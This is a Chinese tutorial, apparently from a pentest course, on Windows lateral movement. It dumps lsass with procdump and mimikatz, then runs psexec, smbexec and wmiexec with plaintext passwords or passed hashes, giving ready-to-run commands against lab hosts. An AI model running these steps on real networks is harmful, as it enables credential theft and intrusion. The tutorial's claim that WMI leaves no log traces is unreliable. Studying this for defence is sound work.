内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

这篇具有很好参考价值的文章主要介绍了内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

内网安全:横向传递攻击.

横向移动就是在拿下对方一台主机后,以拿下的那台主机作为跳板,对内网的其他主机再进行后面渗透,利用既有的资源尝试获取更多的凭据、更高的权限,一步一步拿下更多的主机,进而达到控制整个内网、获取到最高权限、发动高级持续性威胁攻击的目的.(传递攻击主要建立在明文和Hash值获取基础上进行攻击.)


目录:

内网安全:横向传递攻击.

Procdump+Mimikatz 配合获取目标主机密码:

SMB 服务利用(psexec || smbexec)

psexec 利用:

smbexec 利用:

WMI 服务利用.(wmic ||cscript || wmiexec)

(1)自带 WMIC 明文传递 无回显.

(2)自带 cscript 明文传递 有回显.【需要下载wmiexec.vbs工具】

(3)套件【impacket】 wmiexec 明文或 hash 传递 有回显 exe 版本


Procdump+Mimikatz 配合获取目标主机密码:

下载procdump工具:https://learn.microsoft.com/zh-cn/sysinternals/downloads/procdump

下载Mimikatz工具:https://github.com/gentilkiwi/mimikatz/releases
想方法把 procdump 上传在目标主机上.
然后执行这个命令,生成一个 lsass.dmp 文件.(再把他下载在我们主机上进行分析)

procdump -accepteula -ma lsass.exe lsass.dmp

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

在 mimikatz 上执行:

(1)privilege::debug

(2)sekurlsa::minidump lsass.dmp

(3)sekurlsa::logonPasswords full

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)


SMB 服务利用(psexec || smbexec)

利用 SMB 服务可以通过明文或 hash 传递来远程执行,条件 445 服务端口开放.

工具下载:https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstools

psexec 利用:

(1)Psexec第一种:先有 ipc 链接,psexec 需要明文或 hash 传递.
net use \\192.168.0.101\ipc$ "admin" /user:Administrator        // ipc 链接

net use \\目标主机的 IP 地址\ipc$ "目标密码" /user:目标账号
psexec \\192.168.0.101 -s cmd        //-s 以 System 权限运行

psexec \\目标主机 IP 地址 -s cmd

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)


(2)Psexec 第二种:不用建立 IPC 直接提供明文账户密码.[推荐使用]
psexec \\192.168.0.101 -u administrator -p admin -s cmd    // 使用明文连接

psexec \\目标主机 IP 地址 -u 账号 -p 密码 -s cmd

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

密文是在哪收集的.

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

impacket 工具下载:https://gitee.com/RichChigga/impacket-examples-windows/repository/archive/master.zip

直接执行是不行的,所以需要使用impacket工具.

psexec -hashes :哈希值密码 ./账号@目标 IP 地址(组)
psexec -hashes :哈希值密码 域名/账号@目标 IP 地址(域)

psexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./Administrator@192.168.0.101

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)


smbexec 利用:

smbexec 无需先 ipc 链接 明文或 hash 传递.【使用 impacket 工具】
(1)smbexec god/administrator:admin@192.168.0.101    (域名的连接)

    #smbexec 域名/账号:密码@目标的IP地址
    
(2)smbexec ./administrator:admin@192.168.0.101     (组的连接)

    #smbexec ./账号:密码@目标的IP地址

(3)smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./administrator@192.168.0.101

    #smbexec -hashes :密文 ./账号@目标的IP地址

(4)smbexec -hashes :209c6174da490caeb422f3fa5a7ae634 god/administrator@192.168.0.101

    #smbexec -hashes :密文 域名/账号@目标的IP地址

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)


WMI 服务利用.(wmic ||cscript || wmiexec)

WMI 服务是通过 135 端口进行利用,支持用户名明文或者 hash 的方式进行认证,并且该方法不会在
目标日志系统留下痕迹.

(1)自带 WMIC 明文传递 无回显.

wmic /node:192.168.0.101 /user:administrator /password:admin process call create "cmd.exe /c ipconfig >C:\1.txt"

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)


(2)自带 cscript 明文传递 有回显.【需要下载wmiexec.vbs工具】

cscript //nologo wmiexec.vbs /shell 192.168.0.101 administrator admin

cscript //nologo wmiexec.vbs /shell 目标IP地址 账号 密码

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)


(3)套件【impacket】 wmiexec 明文或 hash 传递 有回显 exe 版本

wmiexec ./administrator:admin@192.168.0.101 "whoami"        【文明连接】

wmiexec -hashes :209c6174da490caeb422f3fa5a7ae634 ./administrator@192.168.0.101 "whoami"
【密文连接】

wmiexec ./账号:密码@目标主机的IP地址 "你想要回显信息的命令"【组】

wmiexec 域名/账号:密码@目标主机的IP地址 "你想要回显信息的命令"【域】

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)

     

       

      

学习链接:第67天:内网安全-域横向smb&wmi明文或hash传递_哔哩哔哩_bilibili文章来源地址https://www.toymoban.com/news/detail-479444.html

到了这里,关于内网安全:横向传递攻击(SMB || WMI 明文或 hash 传递)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【内网安全-横向移动】WMI-WMIC命令&相关内网工具

    目录 一、WMI 1、简述:  1)官方介绍: 2)优点: 3)条件: 4)不足: 5)WMIC管理命令: 6)相关工具:  2、上线: 1、wmic 2、impacket-wmiexec 3、wmicmd.exe 4、WMIHACKER  1)官方介绍: WMI 具有 管理员 和 WMI 提供 程序编写器 使用的多个命令行工具 WMI 命令行工具 - Win32 apps | Micros

    2024年01月22日
    浏览(40)
  • 68 内网安全-域横向PTH&PTK&PTT哈希票据传递

    PTH(pass the hash) #利用lm或ntlm的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证TGT进行的渗透测试 PTK(pass the key) #利用的ekeys aes256进行的渗透测试 #PTH在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务而不用提供明文密码

    2024年02月06日
    浏览(28)
  • p68 内网安全-域横向 PTH&PTK&PTT 哈希票据传递

    数据来源 ​ ​ Kerberos 协议具体工作方法,在域中,简要介绍一下: 客户机将明文密码进行 NTLM 哈希,然后和时间戳一起加密(使用krbtgt 密码 hash 作为密钥),发送给 kdc(域控),kdc 对用户进行检测,成功之后创建 TGT(Ticket-Granting Ticket) 将 TGT 进行加密签名返回给客户机器,只

    2024年02月01日
    浏览(27)
  • 8、内网安全-横向移动&RDP&Kerberos攻击&SPN扫描&WinRM&WinRS

    用途:个人学习笔记,有所借鉴,欢迎指正 目录 一、域横向移动-RDP-明文NTLM 1.探针服务: 2.探针连接: 3.连接执行: 二、域横向移动-WinRMWinRS-明文NTLM 1.探针可用: 2.连接执行: 3.上线 CSMSF: 4.CS 内置横向移动 三、域横向移动-SpnKerberos-请求破解重写 Kerberoasting攻击的利用:

    2024年02月19日
    浏览(30)
  • 传递攻击-横向移动

    目录 传递攻击-横向移动 一、哈希传递攻击(PTH) 二、哈希传递条件 三、哈希传递攻击步骤 四、密钥传递攻击(PTK) 五、KB2871997补丁 六、密钥传递攻击步骤 七、票据传递攻击(PTT) 八、票据传递攻击两种方式 九、票据传递攻击步骤 哈希传递攻击(Pass The Hash)是基于 N

    2024年02月08日
    浏览(29)
  • 内网渗透:四、windowsRDP-hash传递登录

    在渗透测试中,如果获得了某个用户的NTLM hash,我们可以尝试使用hash传递的方法对WMI和SMB服务进行登录,对于远程桌面服务同样可以进行利用。抓取hash无法破解的情况下,如果使用hash远程登录RDP,需要 开启\\\"Restricted Admin Mode\\\" , 在Windows8.1和Windows Server 2012R2上默认开启。 0x01:

    2024年02月07日
    浏览(21)
  • 内网安全:隧道技术详解_第125天:内网安全-隧道技术&smb&icmp&正反向连接&防火墙出入规则上线

    目录 隧道技术 反向连接技术 反向连接实验所用网络拓扑图及说明 网络说明 防火墙限制说明 实验前提说明 实战一:CS反向连接上线 - 拿下Win2008 一. 使用转发代理上线创建监听器 二. 上传后门执行上线 隧道技术 - SMB协议 SMB协议介绍 实战二:SMB协议搭建隧道 正向连接 - 拿下

    2024年02月22日
    浏览(35)
  • 内网安全:IPC协议横向移动

    目录 网络拓扑图 网络环境说明 IPC协议 域渗透实战 域内信息收集:域控主机用户凭据网络 IPC协议横向移动 - 执行命令 一. 建立IPC连接 二. 拷贝执行文件到目标机器 三. 添加计划任务 IPC协议横向移动 - CS插件 IPC协议横向移动 - Impacket(常用) EXE版本测试  Py版本测试 - 代理

    2024年04月25日
    浏览(31)
  • 内网安全“小迪安全课堂笔记”域横向

    DMZ,是英文“demilitarized zone”的缩写,中文名称为“隔离区”,也称“非军事化区”。它是为了解决安装防火墙后外部网络的访问用户不能访问内部网络服务器的问题,而设立的一个非安全系统与安全系统之间的缓冲区。该缓冲区位于企业内部网络和外部网络之间的小网络区

    2024年02月04日
    浏览(33)
  • 【内网安全】搭建网络拓扑,CS内网横向移动实验

    实验拓扑结构如下: **攻击者win10地址:**192.168.8.3 dmz win7地址: 10.9.75.49 172.16.1.1 **DC server2008地址:**172.16.1.254 CS服务器 kali: 10.9.75.171 1、搭建CS服务器,CS客户端连接 攻击者充当CS客户端连接 开启监听 生成木马 攻击者win10 攻击者访问dmz的Web服务器,上传一句话木马,蚁剑连

    2024年02月03日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包